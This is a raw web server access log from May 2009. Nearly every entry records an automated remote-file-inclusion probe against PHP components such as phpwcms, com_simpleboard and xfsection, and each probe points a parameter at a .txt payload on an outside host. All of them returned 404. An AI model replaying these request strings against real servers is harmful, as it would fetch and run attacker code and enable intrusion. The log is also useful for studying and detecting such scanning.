72.18.148.82 - - [29/May/2009:01:56:17 -0400] "GET /logs/access_log.Q109051700/errors.php?error=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
121.165.73.157 - - [29/May/2009:01:56:17 -0400] "GET /logs/access_log.Q109052100/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
209.59.12.99 - - [29/May/2009:01:57:31 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.18.148.82 - - [29/May/2009:01:58:12 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
72.18.148.82 - - [29/May/2009:01:58:12 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
72.18.148.82 - - [29/May/2009:01:58:16 -0400] "GET /logs/access_log.Q109051600%20%20//components/com_simpleboard/image_upload.php?sbp=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
121.165.73.157 - - [29/May/2009:01:58:17 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://cafe9.fileave.com/ID1.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
121.165.73.157 - - [29/May/2009:01:58:17 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://cafe9.fileave.com/ID1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
121.165.73.157 - - [29/May/2009:01:58:17 -0400] "GET /logs/access_log.Q109050700%20%20//components/com_simpleboard/image_upload.php?sbp=http://cafe9.fileave.com/ID1.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
121.165.73.157 - - [29/May/2009:01:58:24 -0400] "GET /logs/access_log.Q109052200%20%20//components/com_simpleboard/image_upload.php?sbp=http://cafe9.fileave.com/ID1.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
72.18.148.82 - - [29/May/2009:01:58:24 -0400] "GET /logs/access_log.Q109050700%20%20//components/com_simpleboard/image_upload.php?sbp=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
72.18.148.82 - - [29/May/2009:01:58:59 -0400] "GET /logs/access_log.Q108072400%20%20/errors.php?error=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
72.18.148.82 - - [29/May/2009:01:59:00 -0400] "GET /logs/access_log.Q109051700%20%20/errors.php?error=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
195.34.78.110 - - [29/May/2009:01:59:02 -0400] "GET //modules/xfsection/modify.php?dir_module=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
195.34.78.110 - - [29/May/2009:01:59:04 -0400] "GET //modules/xfsection/modify.php?dir_module=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
